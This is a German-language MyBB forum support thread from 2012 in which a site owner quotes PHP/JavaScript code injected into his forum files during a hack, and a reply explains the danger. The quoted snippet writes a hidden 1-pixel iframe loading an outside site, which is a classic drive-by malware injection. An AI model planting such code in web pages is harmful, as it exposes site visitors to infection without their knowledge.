+- MyBB.de Forum (https://www.mybb.de/forum)
+-- Forum: Archiv (https://www.mybb.de/forum/forum-57.html)
+--- Forum: MyBB 1.6.x (https://www.mybb.de/forum/forum-58.html)
+---- Forum: Allgemeiner Support (https://www.mybb.de/forum/forum-59.html)
+---- Thema: Schadhafter Code? (/thread-26837.html)
Schadhafter Code? - Lambert - 13.11.2012
Hallo Leutz,
nun gabs dieser Tage auch bei mir einen Hackerangriff.
Folgender Code nistete sich in viele Forumsdateien ein:
Code:
<?
#a6f227#
echo " <script type=\"text/javascript\" language=\"javascript\" > (function(){var a = document.createElement('iframe');a.src = 'http://beforew.com';a.style.position = 'absolute';a.style.border = '0';a.style.height = '1px';a.style.width = '1px';a.style.left = '1px';a.style.top = '1px';if(!document.getElementById('d6f39715')){document.write('<div id=\'d6f39715\'></div>');document.getElementById('d6f39715').appendChild(a);}})();</script>";
#/a6f227#
?>Wie gefährlich ist dieser Code? Bestand für die Besucher des Forums jemals die Gefahr einer Infizierung?
(Mittlerweile sind alle Dateien wieder in Originalzustand gebracht worden.)
RE: Schadhafter Code? - MrBrechreiz - 13.11.2012
Es wird ein iframe eingebunden, das heisst, alle die was gein jscript in ihren Browsern deaktiviert haben, sich eine Menge Arbeit aufhalsen. So wie es mir erging. Im schlimmsten Fall muss der PC neu aufgesetzt werden. Du kannst ja den Link http://beforew.com mal durch einen Url Virenscanner laufen lassen.